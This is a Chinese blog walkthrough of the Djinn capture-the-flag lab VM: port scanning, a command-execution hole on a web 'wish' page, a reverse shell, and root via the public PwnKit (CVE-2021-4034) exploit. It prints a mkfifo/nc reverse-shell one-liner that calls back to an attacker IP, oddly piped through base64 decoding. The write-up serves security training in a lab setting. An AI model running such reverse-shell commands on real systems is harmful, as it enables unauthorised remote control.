渗透测试靶场练习——Djinn

最新推荐文章于 2024-04-04 09:17:06 发布
最新推荐文章于 2024-04-04 09:17:06 发布
阅读量779 收藏 1
点赞数
文章标签: web安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aibne_/article/details/125241235
版权

靶场来源:公众号:PTEHub,关注公众号:PTEHub 获取最新靶场资源

靶场类型:单局域网

信息收集

使用nmap进行扫描,获得如下信息

发现存在21端口,运行的服务是 ftp,1337端口运行的服务是waste,7331端口运行的服务是web

其中7331为web端口,web页面如下,没有发现有用信息

尝试对目录进行爆破,获取到了一个wish许愿页面和genie页面,尝试在wish页面输入框许愿一个命令whoami发现在genie页面存在回显,存在命令执行漏洞,那么我们可以许愿一个反弹shell,然后登录用户

登录获取FLAG

我们许愿写入反弹shell成功登录用户www-data,但是没有cat权限,无法获取flag

这里我们用函数mkfifo(建立实名管道)在tmp/aibne文件下写入用base64加密的反弹shell,然后再用base64解密完成后用sh解释器去执行

echo "mkfifo /tmp/aibne;cat /tmp/aibne|
/bin/sh -i 2>& 1|nc 10.17.23.17 3434 >/tmp/aibne" | base64 -d|sh

mkfifo命令基本上可以让你创建FIFO(又名命名管道)

什么是命名管道?

要理解这一点,你应该首先意识到基本管道的概念。 你会看到包含竖线(|)的命令。 这个栏被称为管道。 它所做的是创建两个进程之间的通信通道(执行完整命令时)。

例如:

ls | grep .txt

上面提到的命令由两个程序组成: ls和grep 。 这两个程序都由管道(|)分开。 所以这里的管道是什么,它创建了这些程序之间的通信通道 - 当执行上述命令时,ls的输出将作为输入提供给grep。 最后,在终端上显示的输出只包含那些在其中包含’.txt’字符串的条目。

 提权获取FLAG

我们没有root权限,无法查看flag,用sudo -l,find / -perm -4000 2>/dev/null命令查看一下敏感信息,我们发现更重要的 pkexec 提权漏洞,相关漏洞详情可以了解CVE-2021-4034,我们可以直接用poc拿到root权限再去查看www-data用户下的目录

 通过github下载 pkexec 的poc文件,然后通过python3的http服务实现文件共享,将poc上传到www-data 用户下,通过gcc进行编译后再执行编译好的poc,拿到root权限 

GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)下载链接

成功提权到root,两个flag一起拿

Aibne-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机系列测试 djinn1
08-03
介绍2.1 靶机介绍描述说明The machine is VirtualBox as well as VMWare compatible. The DHCP w
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
渗透测试练习靶场汇总
最新发布
qq_53058639的博客
04-04 625
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
djinn:Djinn分割键盘
04-11
Djinn分割键盘 Djinn是64键分割键盘-双4x7和4键拇指群集。 拇指下方还有一个5向触觉开关。 在奢侈方面,它具有音频,编码器支持,每键RGB和RGB余辉...以及240x320 LCD。 为了安全起见,它在USB连接器和分离式传输连接器(rev2 +的USB-C,rev1的TRS)上均具有ESD保护,瞬态电压抑制和极性保护。 它还运行 ! 只是....还没有在主仓库中。 不幸的是,Djinn当前在QMK的主版本中不受支持,因为它在有点新的硬件上运行。 它还打算用作QMK功能的测试平台,以及升级ChibiOS的主要驱动程序之一。 在适当的时候它将打到QMK大师,但是现在它需要住在外面。 可以在以下位置找到构建Djinn所需的QMK固件分支: 。 可以使用以下方法完成构建: make tzarc/djinn/rev2:default 版本2a BOM: 修正: 5
djinn:一种可视化工具,可在任意组的jar,类,包和Java项目之间创建依赖关系图
05-26
djinn,Java依赖浏览器 描述 一种可视化工具,可在罐,类,包和Java项目的任意集合之间创建依赖关系图。 Djinn可以用来: 分析不依赖于依赖管理系统(例如maven或ivy)的旧代码库,然后生成有助于迁移到这些系统的信息; 找到并修复循环依赖关系; 了解如何构造项目以更快地理解。 仍有大量工作要做-该工具目前仅提供基本功能。 快速开始 如果您不想为构建项目而烦恼: 这是最新的。 或者,您可以通过java webstart运行djinn。 建立和运行 该项目需要使用进行构建,并需要JDK 7(或更高版本)。 尽管它可以在支持Swing应用程序的任何位置运行,但已经在Windows和Linux下进行了测试。 要构建可运行的jar,只需运行: mvn compile assembly:single 生成的工件是target / djinn-gui.jar子目录。
vulnhub靶机-djinn3
臭nana的博客
07-01 1615
1、靶机ip:192.168.0.110(开机就提示:不是所有的都需要扫描发现主机) 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.110 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.110 Host is up (0.0011s latency). Not shown: 65531 closed ports PORT STATE SERVICE V
渗透测试靶场练习——hackmyvm System
Aibne_的博客
06-09 310
渗透测试靶场练习——hackmyvm System
渗透测试靶场练习——University
Aibne_的博客
05-27 539
渗透测试靶场练习——University
渗透测试靶场
菜鸟-传奇
10-24 7279
渗透测试靶场 sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用下载地址:http://xss-quiz.int21h...
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
开源项目-thrisp-djinn.zip
09-05
开源项目-thrisp-djinn.zip,Djinn 1.0: html templating built on standard library html/template
Python库 | djinn_core-1.2.4.tar.gz
05-14
资源分类:Python库 所属语言:Python 资源全名:djinn_core-1.2.4.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | djinn_events-1.0.3.tar.gz
04-08
资源分类:Python库 所属语言:Python 资源全名:djinn_events-1.0.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Vulnhub靶机:DJINN_ 1
LainWith的博客
02-03 1338
目录介绍信息收集主机发现主机信息探测测试1337端口测试21端口(ftp)测试7331端口(web)尝试目录扫描命令执行-反弹shell获取第一个Flag提权获取第二个Flag总结参考 介绍 系列:djinn(此系列共3台) 发布日期:2019 年 11 月 18 日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: gobuster 目录扫描 ftp 匿名登录 bypass 命令执行漏洞 反弹 shell 的使用 靶机地址:https://www
Vulnhub Mercy靶场 Walkthrough
RichardLuo
04-09 105
Vulnhub Mercy靶场 Walkthrough
vulnhub-djinn1
KAKA的博客
07-14 427
获取 IP 地址,目标机器已显示: 获取信息:nmap -A -p- 192.168.67.108 得到 4 个端口: 21 --> FTP --> open --> 猜测有文件可获取 22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过] 1337 --> SOME --> open --> 使用 nc 连接 7331 --> HTTP --> open --> 网页 21 --> FTP
gigachad1靶机详解
weixin_44681307的博客
07-11 414
在kali中搜索一下有没有漏洞,结果搜索到了一个,我们下载到本机上,然后用python开启一个http服务传到靶机。Google识图一下,百度找不到的,发现是叫做少女塔,这里ssh密码其实就出来了,就是maidenstower。file一下发现是一个zip文件,unzip解压一下,发现给了一个用户名chad,一个图片地址。我们下载到靶机的/tmp目录中,加一个执行权限,运行一下,发现root权限了。扫描到ip后对ip做一个全面扫描,发现有一个匿名服务器,是可以免密登陆的。sudo命令是没有的,我都试过了。
【VulnHub】【2023年07月18日】最新全部靶场详情(中)
惟忆
07-18 8156
【VulnHub】【2023年07月18日】最新全部靶场详情(中)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值